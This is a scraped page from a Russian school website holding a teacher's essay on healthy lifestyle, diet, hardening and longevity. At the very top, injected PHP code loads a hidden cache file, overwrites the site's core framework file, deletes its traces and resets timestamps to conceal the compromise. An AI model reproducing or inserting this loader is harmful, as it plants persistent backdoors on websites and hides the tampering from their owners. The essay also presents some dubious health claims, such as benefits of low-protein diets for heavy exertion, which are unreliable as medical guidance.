$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Значение здорового образа жизни для улучшения здоровья и долгожительства

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 210394

На сайте

Сейчас 21 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Значение здорового образа жизни для улучшения здоровья и долгожительства

Индекс материала
Значение здорового образа жизни для улучшения здоровья и долгожительства
2 страница
3 страница
Все страницы

Муниципальное бюджетное общеобразовательное учреждение «Сагарчинская средняя общеобразовательная школа Акбулакского района Оренбургской области»


 

Учитель: Ткачев П.И.

 

Значение здорового образа жизни для улучшения здоровья и долгожительства.

 

 

План:

1. Введение.

2. Здоровье, здоровый образ жизни.

3. Цель и смысл жизни современного человека.

4. Задачи и система духовного совершенствования человека.

5. Питание и его значение для жизни человека.

6. Как стать счастливым обладателем укрепления своего здоровья. Значение физических упражнений.

7. Гигиена и закаливание организма как фактора здоровья.

8. Привычки, способствующие продлению жизни.

9. Заключение.


 

От нездорового тела человека вряд ли можно ждать здорового духа: интерес к образованию, к общественной деятельности, к самостоятельной учёбе и т.д. Сейчас, в среднем, из 100 новорожденных детей только 20 не имеют никакого отклонения в состоянии здоровья. Заканчивают школу из 100 выпускников от 4 до 15 % здоровыми.

Академия педагогических наук зафиксировала, что из года в год происходит снижение физкультурной и спортивной активности учащихся в последние годы на 16-20%.

Общество становится физически больным. Стабильная жирная пища, табак, алкоголь, многочасовое сидение перед телевизором — и это так называемый отдых после тяжёлой работы или учёбы в неблагоприятных условиях! 13-15 лет — возраст переходной от детства к взрослости. Некоторые подростки, желая показаться более взрослыми и независимыми, начинают курить и потреблять алкогольные напитки. О каком здоровье и долголетии тут можно говорить?

«Вряд ли какие-либо обстоятельства более вредят вашему здоровью, чем наш образ жизни». К сожалению, эти слова Себастьяна Кнайка за прошедшее столетие не утратили своей значимости. Более того — стали ещё более актуальными. В последнее десятилетие в этой области заметны у американцев положительные сдвиги.

По данным всемирной организации здравоохранения (ВОЗ) смертность от сердечно-сосудистых заболеваний в США начала снижаться в конце 70-х годов. В этом надо признать влияние достижений фармакологии и хирургии, но главная, как говорят учёные, причина в том, что они всё в большей мере переходят к здоровому образу жизни. Изменили его американцы — стали дольше жить и меньше болеть. В России и в странах Восточной Европы, по словам руководителя отдела сердечно-сосудистых заболеваний ВОЗ Ивана Герфата, смертность увеличивается из-за нездорового образа жизни.

Медицинская наука сейчас идёт путём борьбы с одним из негативных последствий научно-технического прогресса — лавинообразным ростом хронических болезней человека.

Здесь уместно напомнить слова американского учёного Поля Брэгга: «Есть только два сорта людей: настоящие — они сами заботятся о себе, и ненастоящие — заботу о себе они взваливают на плечи окружающих и врачей... самое большое открытие человека — это умение омолодить себя физически, умственно и духовно».

Здоровый образ жизни (ЗОЖ) — это процесс соблюдения человеком определённых норм и правил повседневной жизни, способствующих приобретению и приумножению гармоничного здоровья для комфортного состояния в условиях окружающей среды, а также высокого уровня учебно - трудовой и иной профессиональной деятельности. ЗОЖ включает в себя достаточную физическую и умственную активность, естественное (правильное) питание, наличие чистого воздуха и воды, постоянное закаливание, возможно большую связь с природой, соблюдение правил личной гигиены, отказ от вредных привычек.

Здоровье (в широком смысле слова) означает не только отсутствие болезней, но и неинтересной работы, если человек относится творчески, как говорят «с огоньком», азартно. Нужно обучить себя радоваться процессу борьбы и азарту действий.

Смысл жизни человека - это постоянное восхождение к вершинам самосовершенствования, стремление к внутренней свободе через объективные знания и использование без ущерба для других законов развития природы и общества на основе поиска истины. Познай себя - и ты обретёшь счастье и свободу. Это цель каждого человека.

Как говорит создатель клуба здорового образа жизни «Вита» в Свердловске Галина Сергеевна Шаталова, духовность — это умение общаться с самим собой, природой, с людьми, общаться чутко, высоко и доверительно. для клуба «Вита» основными задачами духовного совершенствования стали:

1. Воспитание дисциплины ума, осмысление себя, мира и космоса в отдельности и во взаимосвязи.

2. Воспитание в себе чувства прекрасного, умение находить высокий смысл даже в самой малой мелочи.

3. Осознание цели жизни.

4. Воспитание умения сосредоточиться, сконцентрироваться, так как суетный, нервный человек не имеет в себе сил на организацию ЗОЖ.

5. осознание своих внутренних резервов, веры в себя.

Система, предлагаемая Г.С. Шаталовой, подразумевает поиск человеком «своей экологической ниши». Её компоненты:

- постоянное духовное самосовершенствование;

- переход на натуральное биологическое питание;

- каждодневное занятие быстрой ходьбой (оздоровительными упражнениями) и суставной гимнастикой, овладение культурой движения и расслабления;

- ежедневное одно-двухразовое термозакаливание;

- контроль над дыханием;

- освоение положительных психологических навыков.

Такая комплексная перестройка образа жизни значительно облегчает освоение отдельных элементов системы. Например, переход на низкокалорийную и малобелковую пищу позволяет освоить значительные физические нагрузки.